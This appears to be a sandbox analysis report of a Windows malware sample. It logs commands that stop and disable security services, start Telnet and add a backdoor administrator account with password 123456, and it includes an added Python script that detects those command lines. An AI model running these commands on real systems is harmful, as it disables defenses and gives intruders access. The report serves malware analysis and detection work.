PID 2796 wrote to memory of 2196 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe
PID 2796 wrote to memory of 1332 N/A C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe C:\Windows\SysWOW64\cmd.exe

Processes

Recorded process tree, as executable image followed by its command line. The sample writes Option.bat and UpdatAuto.exe into the system directory, runs Option.bat both directly and through the dropped UpdatAuto.exe, starts a second executable written beside it in Temp (the ~4.exe file, PID 3000, which crashes and is handed to WerFault.exe), and through cmd.exe /c stops four services, disables their start type with sc config, starts the Telnet server (TlntSvr), sets a password on the helpassistant account and adds it to the local Administrators group. Two caveats when reading this list: net user without /add only sets the password of an account that already exists (HelpAssistant is the Windows XP Remote Assistance account; the report does not show whether it existed on this host, and if it did not, the localgroup step has nothing to add), and the service names are XP-era (SharedAccess hosted the Windows Firewall on XP but is Internet Connection Sharing on Windows 7, where the firewall runs as MpsSvc, and srservice is the XP System Restore service, absent on Windows 7), so part of this kill list is aimed at an older Windows than the detonation platform.

C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe
  "C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe"
C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\system32\Option.bat
C:\Windows\SysWOW64\UpdatAuto.exe
  C:\Windows\system32\UpdatAuto.exe
C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\system32\Option.bat
C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe
  e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe
C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3000 -s 152
C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop sharedaccess
C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop wuauserv
C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop wscsvc
C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop srservice
C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net start TlntSvr
C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net user helpassistant 123456
C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net localgroup administrators helpassistant /add
C:\Windows\SysWOW64\sc.exe
  sc config srservice start= disabled
C:\Windows\SysWOW64\sc.exe
  sc config SharedAccess start= disabled
C:\Windows\SysWOW64\sc.exe
  sc config wuauserv start= disabled
C:\Windows\SysWOW64\sc.exe
  sc config wscsvc start= disabled
C:\Windows\SysWOW64\sc.exe
  sc config srservice start= disabled
C:\Windows\SysWOW64\net.exe
  net stop wuauserv
C:\Windows\SysWOW64\net.exe
  net stop sharedaccess
C:\Windows\SysWOW64\net.exe
  net start TlntSvr
C:\Windows\SysWOW64\net.exe
  net stop wscsvc
C:\Windows\SysWOW64\net.exe
  net user helpassistant 123456
C:\Windows\SysWOW64\net.exe
  net localgroup administrators helpassistant /add
C:\Windows\SysWOW64\net.exe
  net stop srservice
C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 start TlntSvr
C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop sharedaccess
C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop wuauserv
C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 user helpassistant 123456
C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 localgroup administrators helpassistant /add
C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop srservice
C:\Windows\SysWOW64\net1.exe
  C:\Windows\system32\net1 stop wscsvc
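The service-tampering, account and Telnet commands recorded above are what a process-creation detection should key on, and they arrive in three spellings (wrapped in cmd.exe /c, as net.exe, and as the net1.exe helper that net.exe spawns). The Python script below is an added example for this page, not part of the sandbox report or of the sample: it normalises each recorded command line (drops quotes, path prefixes, the .exe suffix and any cmd /c wrapper so net, net1 and sc are handled alike), applies a small rule set, and tags each hit with an ATT&CK technique. The sample command lines are copied from the process list above; the service descriptions and technique mapping are the editor's, and the "protective service" list is deliberately limited to the four names this sample targets.

```python
"""Classify recorded process command lines against the behaviours seen in this report.

Added example for this page; not part of the sandbox report or the sample.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Services the sample stops and disables, with the editor's note on what each protects.
# The names are XP-era: on Windows 7 SharedAccess is ICS (the firewall is MpsSvc) and
# srservice does not exist, but the sample targets them regardless.
PROTECTIVE_SERVICES = {
    "sharedaccess": "Internet Connection Sharing (hosted the Windows Firewall on XP)",
    "wuauserv": "Windows Update",
    "wscsvc": "Security Center",
    "srservice": "System Restore (Windows XP service name)",
}
REMOTE_ACCESS_SERVICES = {"tlntsvr": "Telnet server"}
PRIVILEGED_GROUPS = {"administrators"}

# Command lines copied from the Processes section of this report.
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe"',
    r"cmd /c C:\Windows\system32\Option.bat",
    r"C:\Windows\system32\UpdatAuto.exe",
    r"cmd.exe /c net stop sharedaccess",
    r"cmd.exe /c net stop wuauserv",
    r"cmd.exe /c net stop wscsvc",
    r"cmd.exe /c net stop srservice",
    r"cmd.exe /c net start TlntSvr",
    r"cmd.exe /c net user helpassistant 123456",
    r"cmd.exe /c net localgroup administrators helpassistant /add",
    r"sc config srservice start= disabled",
    r"sc config SharedAccess start= disabled",
    r"sc config wuauserv start= disabled",
    r"sc config wscsvc start= disabled",
    r"C:\Windows\system32\net1 stop wuauserv",
    r"C:\Windows\system32\net1 user helpassistant 123456",
    r"C:\Windows\system32\net1 localgroup administrators helpassistant /add",
]


@dataclass(frozen=True)
class Finding:
    technique: str  # ATT&CK technique the command maps to (editor's mapping)
    detail: str     # what the command does in this sample
    cmdline: str    # the recorded command line that triggered the rule


def _program_and_args(cmdline):
    """Return (program, args) with quotes, path prefixes, '.exe' and 'cmd /c' wrappers removed."""
    tokens = cmdline.replace('"', "").split()
    while tokens:
        prog = re.split(r"[\\/]", tokens[0])[-1].lower()
        prog = prog[:-4] if prog.endswith(".exe") else prog
        if prog == "cmd" and len(tokens) > 1 and tokens[1].lower() in ("/c", "/k"):
            tokens = tokens[2:]  # classify the command cmd.exe was asked to run
            continue
        return prog, [t.lower() for t in tokens[1:]]
    return "", []


def classify(cmdline):
    """Map one command line to a Finding, or None if no rule matches."""
    prog, args = _program_and_args(cmdline)
    if prog in ("net", "net1") and len(args) >= 2:
        verb, target = args[0], args[1]
        if verb == "stop" and target in PROTECTIVE_SERVICES:
            return Finding("T1562.001 Impair Defenses: Disable or Modify Tools",
                           f"stops {PROTECTIVE_SERVICES[target]}", cmdline)
        if verb == "start" and target in REMOTE_ACCESS_SERVICES:
            return Finding("T1021 Remote Services",
                           f"starts the {REMOTE_ACCESS_SERVICES[target]}", cmdline)
        if verb == "user" and len(args) >= 3:
            if "/add" in args:
                return Finding("T1136.001 Create Account: Local Account",
                               f"creates local account {target!r}", cmdline)
            # Without /add, net user only sets the password of an account that already exists.
            return Finding("T1098 Account Manipulation",
                           f"sets the password of existing account {target!r}", cmdline)
        if verb == "localgroup" and len(args) >= 3 and "/add" in args and target in PRIVILEGED_GROUPS:
            return Finding("T1098 Account Manipulation",
                           f"adds {args[2]!r} to the local {target} group", cmdline)
    if prog == "sc" and len(args) >= 2 and args[0] == "config":
        # 'sc config X start= disabled' tokenises as ['config', 'x', 'start=', 'disabled'];
        # the regex also accepts 'start=disabled' written without the space.
        svc = args[1]
        if svc in PROTECTIVE_SERVICES and re.search(r"start=\s*disabled\b", " ".join(args[2:])):
            return Finding("T1562.001 Impair Defenses: Disable or Modify Tools",
                           f"sets {PROTECTIVE_SERVICES[svc]} start type to disabled", cmdline)
    return None


def triage(cmdlines):
    """Classify every command line and keep the hits, in recorded order."""
    return [f for f in map(classify, cmdlines) if f is not None]


def summarize(findings):
    """Count findings per technique ID (the token before the first space)."""
    return dict(Counter(f.technique.split()[0] for f in findings))


if __name__ == "__main__":
    hits = triage(SAMPLE_CMDLINES)
    for f in hits:
        print(f"{f.technique:55} {f.detail:70} <- {f.cmdline}")
    print(summarize(hits))
```

Run against the report's own command lines the rules fire 14 times (nine service stop/disable hits, four account hits, one Telnet start) and stay silent on the sample, Option.bat and UpdatAuto.exe launches themselves, which is the intended split: the loader paths are hash-specific, while the net/sc behaviour is what survives a recompile. Because net.exe re-executes every command through net1.exe, a rule that only watches net.exe double-counts; deduplicate on (parent PID, normalised command) or watch net1.exe alone in a real pipeline.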

Network

N/A

Files

Dropped and modified files with their digests. \??\c:\ntldr~6 appears six times with six different digest sets, so it is rewritten during the run and its hashes are not stable indicators; the path name is. The listing is cut off after the MD5 and SHA1 of C:\Program Files\7-Zip\7zFM.exe.

C:\Windows\SysWOW64\Option.bat

MD5 1d04abf39e9df55eed1d04430cc21eb8
SHA1 b8292861dfd4e046eb9625e1571cc08c26094d41
SHA256 0bc485263cf8a962e64db0b88f156f2a9af1b81ecfdb1cf9111d497e85df70f3
SHA512 a2cccc03dadecf6a298b274a6735675aeec1cc280f84432498e9df31aa4a543d2557a2fd06bac4fc8778a774b30bbd31f91c1d0d3ace480b6217654c8d63a7d0

\Windows\SysWOW64\UpdatAuto.exe

MD5 c71e745a2d45cb7353c7f527c97c9115
SHA1 15499d15a6ecbd60ab2723c9b61e5e5afc84048c
SHA256 eaf3e2e75aa573c24dfc588b5cc697b1288c826b12f8435d87fabb8a47312906
SHA512 517964a4654f8103330fdb514220eddef69efdfdcc39f70c44f4dd5af1a34175eeaeaf3e1d6224141063a1603a3bdd1e88977c29e6726ecf34ccb4f16bdd93c2

\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb~4.exe


Analysis: behavioral2

Detonation Overview

Submitted

2024-11-03 05:22

Reported

2024-11-03 05:25

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe"

Signatures

Disables service(s)

evasion execution

Grants admin privileges

Network Share Discovery

discovery

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\Option.bat C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Windows\SysWOW64\UpdatAuto.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File created C:\Windows\SysWOW64\Option.bat C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Windows\SysWOW64\UpdatAuto.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdeps.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javap.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaw.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaw.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\idlj.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jcmd.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\ktab.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javac.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\klist.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javacpl.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jrunscript.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome_proxy.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javadoc.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jmap.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdeps.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javac.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jarsigner.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javapackager.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\7-Zip\7zFM.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jar.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jdb.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\7-Zip\7zG.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\createdump.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javap.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jmap.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jar.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\pack200.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\notification_helper.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jjs.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jps.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\rmic.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\extcheck.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\extcheck.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jjs.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\dotnet\dotnet.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\serialver.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\7-Zip\Uninstall.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\java.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jsadebugd.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsimport.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javadoc.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jhat.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\keytool.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javaws.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\7-Zip\7z.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\dotnet\dotnet.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\createdump.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\rmiregistry.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsgen.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\createdump.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\chrome_pwa_launcher.exe C:\Windows\SysWOW64\UpdatAuto.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jabswitch.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\schemagen.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\javah.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\jconsole.exe C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e163f5bbb632d8e043f47d261f2c8d2e6339a0ab3737329d9b0ef7e7abce76eb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\UpdatAuto.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\net1.exe N/A

Runs net.exe

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
